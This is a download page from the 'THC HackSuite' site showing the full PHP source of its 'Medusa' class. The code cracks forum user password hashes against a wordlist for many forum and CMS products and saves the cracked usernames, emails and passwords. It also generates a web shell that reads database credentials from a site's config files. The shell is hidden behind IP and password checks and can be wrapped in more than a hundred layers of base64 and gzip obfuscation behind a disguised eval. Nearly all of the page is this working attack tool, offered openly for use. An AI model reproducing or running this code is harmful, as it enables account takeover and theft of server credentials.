random gallery image
random tutorial
preview..going to create a new app for the hacksuite. We're not going to do anything fancy here, we will make a simple app to get familiar how to write compatible scripts for the suite. We..
random other
xConverter
THC xConverter is a tool that makes use of (php) functions in order to calculate, fetch, convert and encrypt data
HackSuite File Library
File Library
Here you can find the latest files and structure of the THC HackSuite, note that if you have an earlier version of the suite it's not recommended to update files manually. Instead you should overwrite your existing HackSuite environment.
<?php
/*
Contains all functionality for Medusa.
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 12-11-2014
*/
/* THC Medusa Class */
class THC{
var $aWords = "";
var $aProperties = "";
var $aUserHash = "";
/* main */
function THC(){
}
/* safely load wordlist while preventing file injection vulnerabilities */
function LoadWordlist($sWordlist){
$sWordlist = "../../Wordlists/".$this->ExploitFilter($sWordlist,0,1);
if(false===($aFileData = @file($sWordlist))){
return(false);
}
$this->aWords = $aFileData;
return(true);
}
/* safely load properties from a configuration file while preventing file injection vulnerabilities */
function LoadProperties($sProduct){
$sProduct = "../forums/".$this->ExploitFilter($sProduct,0,1);
if(!file_exists($sProduct)){
return(false);
}
include_once($sProduct);
$this->aProperties = $_PROPERTIES;
return(true);
}
/* execute universal load users query and stores them in var $aUserHash */
function LoadUsers(){
$rQuery = @mysql_query($this->aProperties['queryraw']['attack']);
// UNCOMMENT IF YOU WANT TO SAVE THE QUERY IN test.txt
// $this->WriteF("test.txt",$this->aProperties['queryraw']['attack'],"w");
$this->aProperties['total'] = @mysql_num_rows($rQuery);
$this->aUserHash = array();
if($this->aProperties['total']!=0){
while(false!==($aRow = @mysql_fetch_array($rQuery,MYSQL_ASSOC))){
$this->aUserHash[] = $aRow;
}
}
}
/* black hat one user cracking */
function SetUser($aUser){
$this->aUserHash[] = $aUser;
}
/* returns the email address of a user */
function GetEmail($sUser){
$rQuery = @mysql_query(str_replace("/user/",$sUser,$this->aProperties['queryraw']['getemail']));
return(@mysql_result($rQuery,0,'temail'));
}
/* checks whether the encrypted password matches the hash from the database */
function UserLogin($sUser,$sPass,$sHash,$sSalt=""){
$sEncrypt = "";
$sPass = trim($sPass);
switch($this->aProperties['name']){
case"SMF1":
$sEncrypt = @sha1(strtolower($sUser).$sPass);
break;
case"SMF2":
$sEncrypt = @sha1(strtolower($sUser).$sPass);
break;
case"MyBB":
$sEncrypt = @md5(md5($sSalt).md5($sPass));
break;
case"IPB":
$sEncrypt = @md5(md5($sSalt).md5($sPass));
break;
case"vBulletin4":
$sEncrypt = @md5(md5($sPass).$sSalt);
break;
case"vBulletin3":
$sEncrypt = @md5(md5($sPass).$sSalt);
break;
case"vBulletin5":
$sEncrypt = @md5(md5($sPass).$sSalt);
break;
case"FluxBB":
$sEncrypt = @sha1($sPass);
break;
case"phpBB":
return(phpbb_check_hash($sPass,$sHash) ? true : false);
break;
case"Drupal6":
$sEncrypt = @md5($sPass);
break;
case"Drupal7":
return(user_check_password2($sPass,$sHash) ? true : false);
break;
case"Dolphin":
$sEncrypt = sha1(md5($sPass).$sSalt);
break;
case"Joomla3":
return(PassHashing($sPass,$sHash) ? true : false);
break;
case"Joomla2":
return(PassHashing2($sPass,$sHash) ? true : false);
break;
case"Wordpress":
$cWP = new PasswordHash();
return($cWP->CheckPassword($sPass,$sHash) ? true : false);
case"Vanilla":
$cVanilla = new Gdn_PasswordHash2();
return($cVanilla->CheckPassword($sPass,$sHash,"vanilla") ? true : false);
break;
case"AEF":
$sEncrypt = md5($sSalt.$sPass);
break;
case"MiniBB":
$sEncrypt = md5($sPass);
break;
case"Phorum":
$sEncrypt = md5($sPass);
break;
case"UseBB":
$sEncrypt = md5($sPass);
break;
case"phpFusion":
$sEncrypt = hash_hmac("sha256",$sPass,$sSalt);
break;
case"AVS":
$sEncrypt = md5($sPass);
break;
case"XMB":
$sEncrypt = md5($sPass);
break;
}
return($sEncrypt==$sHash ? true : false);
}
/* creates serialized data so you can keep track of the session's progress */
function CrackUsers($iType){
$iUsers = count($this->aUserHash);
if($iUsers!=0){
// if there are users to crack
$aData = array();
$aData['tstart'] = time();
$aData['total'] = $iUsers;
$aData['product'] = $this->aProperties['name'];
$aData['version'] = $this->aProperties['version'];
$aData['matches'] = 0;
$aData['start'] = date('d-m H:i',$aData['tstart']);
$aData['current'] = 0;
$aData['last_user'] = "";
$aData['users'] = array();
// create session identifier and filename to store the results into
$sFileSession = substr(sha1(time().mt_rand(0,10000)),0,10);
$sResultsFile = "results/".$sFileSession.".txt";
$aData['identifier'] = $sFileSession;
// create results file
$this->WriteF($sResultsFile,serialize($aData),"w");
// insert record into task file
$this->WriteF("tasks.php",$sFileSession."|".$aData['tstart']."|0\n","a");
for($x=0;$x<$iUsers;$x++){
$aData['current']++;
if(is_int($aData['current']/10)){
$this->WriteF($sResultsFile,serialize($aData),"w");
}
for($y=0;$y<count($this->aWords);$y++){
if(@$this->UserLogin($this->aUserHash[$x]['crackuser'],trim($this->aWords[$y]),$this->aUserHash[$x]['crackpass'],(isset($this->aUserHash[$x]['crackhash']) ? $this->aUserHash[$x]['crackhash'] : ""))==true){
// easy user password, store the email and username
$aData['matches']++;
$aData['last_user'] = $this->aUserHash[$x]['crackuser'];
if($iType==0){
$aData['users'][] = array($this->aUserHash[$x]['crackuser'],$this->GetEmail($aData['last_user']));
}
else{
$aData['users'][] = array($this->aUserHash[$x]['crackuser'],$this->aWords[$y]);
}
$this->WriteF($sResultsFile,serialize($aData),"w");
continue;
}
}
}
// finalize record in task file
$this->WriteF("tasks.php",str_replace($sFileSession."|".$aData['tstart']."|0",$sFileSession."|".$aData['tstart']."|1",file_get_contents("tasks.php")),"w");
// finalize record in data file
$this->WriteF($sResultsFile,serialize($aData),"w");
}
}
/* gets the result file for the scan and returns it as a json structure */
function CreateJSON($aData){
$aRecords = array();
for($x=0;$x<count($aData);$x++){
// every iteration is a (running) task
$sData = @file_get_contents("results/".$aData[$x][0].".txt");
if($sData!=false){
$aRecords[] = @unserialize($sData);
}
}
return(json_encode($aRecords));
}
/* fetches all filenames from a directory */
function GetFilesByDirectory($sDir){
if(!$rHandle = @opendir($sDir)){
return(false);
}
$aFileBuffer = array();
while(false!==($sFile = @readdir($rHandle))){
// buffer all files
if($sFile!="." && $sFile!=".."){
if(!is_dir($sDir."/".$sFile)){
$aFileBuffer[] .= $sFile;
}
}
}
@closedir($rHandle);
return $aFileBuffer;
}
/* fetches all php files from a directory and it's sub directories */
function GetPHPFiles($sDir){
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($sDir),RecursiveIteratorIterator::CHILD_FIRST);
$aData = array();
foreach($iterator as $path){
if(!$path->isDir()){
$aData[] = ($path->__toString());
}
}
return($aData);
}
/* fetches all files that can be created for shell management */
function GetSystemFiles($sDir){
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($sDir),RecursiveIteratorIterator::CHILD_FIRST);
$aData = array();
foreach($iterator as $path){
unset($_SYSTEM);
if(!$path->isDir()){
$sPath = $path->__toString();
include_once($sPath);
if(isset($_SYSTEM)){
$aData[] = $sPath;
}
}
}
return($aData);
}
/* opens a (task) file and split every line into pieces */
function RawToArray($sFile,$sSeparate="|"){
if(!$aFileData = @file($sFile)){
return(false);
}
$aDataBuffer = array();
for($x=0;$x<count($aFileData);$x++){
if(!$aDataBuffer[$x] = @explode($sSeparate,$aFileData[$x])){
if($aFileData[$x]==""){
continue;
}
}
}
return($aDataBuffer);
}
/* used for preventing LFI exploits in file requests */
function ExploitFilter($sString,$bXSS=false,$bFI=false,$bSQL=false){
if($bXSS==false && $bFI==false && $bSQL==false){
return($sString);
}
if(!is_string($sString)){
return($sString);
}
if($bXSS){
$sString = strip_tags($sString);
}
if($bFI){
$sString = str_replace("../","",$sString);
$sString = str_replace("./","",$sString);
$sString = preg_replace('[^a-zA-Z0-9\-_\.\/ ]','',$sString);
}
if($bSQL){
$sString = mysql_real_escape_string($sString);
}
return($sString);
}
/* writes data to a file, overwrites it or creates a new file with the content in $sWrite */
function WriteF($sDest,$sWrite,$sMode="a"){
if($sMode!="a" && $sMode!="w"){
$sMode = "a";
}
if(!$rNew = @fopen($sDest,$sMode)){
return(false);
}
@fputs($rNew,$sWrite);
@fclose($rNew);
return(true);
}
/* creates the database connection and selects the specified database */
function MySQLConnect($aCredentials){
$rConnect = @mysql_connect($aCredentials['host'],$aCredentials['username'],$aCredentials['password']);
@mysql_select_db($aCredentials['database']);
}
/* creates a medusa shell */
function MedusaShell($aSystem,$aOptions){
$sShell = "set_time_limit(0);\n";
$sTemplate = "";
if(isset($aOptions['ip'])){
// ip protection
$sShell .= "if(\$_SERVER['REMOTE_ADDR']!=\"".$aOptions['ip']."\"){\n";
$sShell .= " header(\"Location: http://www.google.com\");\n";
$sShell .= " exit;\n";
$sShell .= "}\n";
}
if(isset($aOptions['pass'])){
// password protection
$sShell .= "if(!isset(\$_POST['sPass']) || sha1(\$_POST['sPass'])!=\"".sha1($aOptions['pass'])."\"){\n";
$sShell .= " echo'<html>\n";
$sShell .= " <head></head>\n";
$sShell .= " <body>\n";
$sShell .= " <form method=\"post\">\n";
$sShell .= " <input type=\"password\" name=\"sPass\" /> <input type=\"submit\" name=\"submit\" value=\"Submit\" />\n";
$sShell .= " </form>\n";
$sShell .= " </body>\n";
$sShell .= " </html>';\n";
$sShell .= " exit;\n";
$sShell .= "}\n";
}
// create shell based on system array
$sShell .= "\$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(\$_SERVER['DOCUMENT_ROOT']),RecursiveIteratorIterator::CHILD_FIRST);\n";
$sShell .= "foreach(\$iterator as \$path){\n";
$sShell .= " if(!\$path->isDir()){\n";
$sShell .= " \$sPath = \$path->__toString();\n";
$sShell .= " \$sFile = \"".$aSystem['file']."\";\n";
$sShell .= " if(strtoupper(substr(PHP_OS,0,3))==='WIN'){\n";
$sShell .= " \$sFile = str_replace(\"/\",\"\\\\\",\$sFile);\n";
$sShell .= " }\n";
$sShell .= " if(strpos(\$sPath,\$sFile)!==false){\n";
$sShell .= " \$sData = file_get_contents(\$sPath);\n";
$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['user'])."',\$sData,\$aUser);\n";
$sShell .= " if(!isset(\$aUser[1])){\n";
$sShell .= " continue;\n";
$sShell .= " }\n";
$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['database'])."',\$sData,\$aDB);\n";
$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['password'])."',\$sData,\$aPass);\n";
$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['host'])."',\$sData,\$aHost);\n";
$sShell .= " \$sResult = \"<b>user:</b> \".\$aUser[1].\"<br />\";\n";
$sShell .= " \$sResult .= \"<b>pass:</b> \".\$aPass[1].\"<br />\";\n";
$sShell .= " \$sResult .= \"<b>host:</b> \".\$aHost[1].\"<br />\";\n";
$sShell .= " \$sResult .= \"<b>database:</b> \".\$aDB[1].\"<br />\";\n";
$sShell .= " die(\$sResult);\n";
$sShell .= " }\n";
$sShell .= " }\n";
$sShell .= "}\n";
$sShell .= "die(\"Failed to get login information.\");\n";
if(isset($aOptions['encrypt'])){
// source protection
if($aOptions['encrypt']=="normal"){
$sShell = "eval(base64_decode('".base64_encode($sShell)."'));\n";
}
else{
$sEncoder = "\$sPull = \"leverage the inflatable base 4/16 and_or gza jump to tor strings code compressing unescaped\";\n";
$sEncoder .= "\$aPull = explode(\" \",\$sPull);\n";
$sEncoder .= "\$aF = array();\n";
$sEncoder .= "\$aF[] = \$sPull[1].\$sPull[2].\$sPull[5].\$sPull[0];\n";//eval
$sEncoder .= "\$aF[] = substr(\$sPull,57,3).\$sPull[4].\$aF[0][0].\$aF[0][1];\n";//strrev
$sEncoder .= "\$aF[] = substr(\$sPull,41,2).substr(\$sPull,13,6).\$aF[0][0];\n";//gzinflate
$sEncoder .= "\$aF[] = \$aF[2][0].\$aF[2][1].\$sPull[(strpos(\$sPull,\"_\")-1)].\$aF[0][0].substr(\$aF[2],4);\n";//gzdeflate
$sEncoder .= "\$aF[] = \$aPull[3].str_replace(\"1/\",\"\",\$aF[1](\$aPull[4])).\"_\".\$aF[0][0].\$aF[2][3].\$aPull[11];\n";//base64_encode
$sEncoder .= "\$aF[] = substr(\$aF[4],0,7).\$aF[3][2].\$aF[0][0].substr(\$aF[4],9);\n";//base64_decode
$sEncoder .= "\$aF[] = substr(\$aF[3],0,2).substr(\$aPull[13],0,2).substr(\$aPull[12],0,8);\n";//gzuncompress
$sEncoder .= "\$aF[] = str_replace(substr(\$aPull[13],0,2),\"\",\$aF[6]);\n";//gzcompress
// encode and decode functions
$_ENCODE = array();
$_ENCODE[0] = array(7,"gzcompress");
$_ENCODE[1] = array(4,"base64_encode");
$_DECODE = array();
$_DECODE[0] = array(6,"gzuncompress");
$_DECODE[1] = array(5,"base64_decode");
// good luck decrypting the shell :p
$iEncryptions = count($_ENCODE)-1;
$iEncryptionLoops = mt_rand(120,150);
for($x=0;$x<$iEncryptionLoops;$x++){
$iEncryption = mt_rand(0,$iEncryptions);
$sShell = "\$aF[".$_ENCODE[$iEncryption][0]."]('".$_ENCODE[$iEncryption][1]($sShell)."')";
}
$sShell = $sEncoder.$sShell.";";
}
}
if(isset($aOptions['shellcreate'])){
// save source
return($this->WriteF($aOptions['shellcreate'],"<?php\n".$sShell."?>","w"));
}
else{
$sShell = str_replace("\n","<br />\n",htmlspecialchars("<?php\n".$sShell)."?>");
return($sShell);
}
}
}
?>
powered by
site stats
cms statistics:
version: 0.6.0downloads: 4381
native: 26
modules: 21
apps: 2
support development
It takes lots of calories in order to create new things for the hacksuite, so it would be grand if you could buy me a protein shake or extra energy to keep me going. Thanks!
disclaimer
We are not responsible for any direct or indirect damage caused by abusing the tools provided on hacksuite.com. The suite is developed for educational purposes, use at your own risk!
site resources
remote resources
partners and friends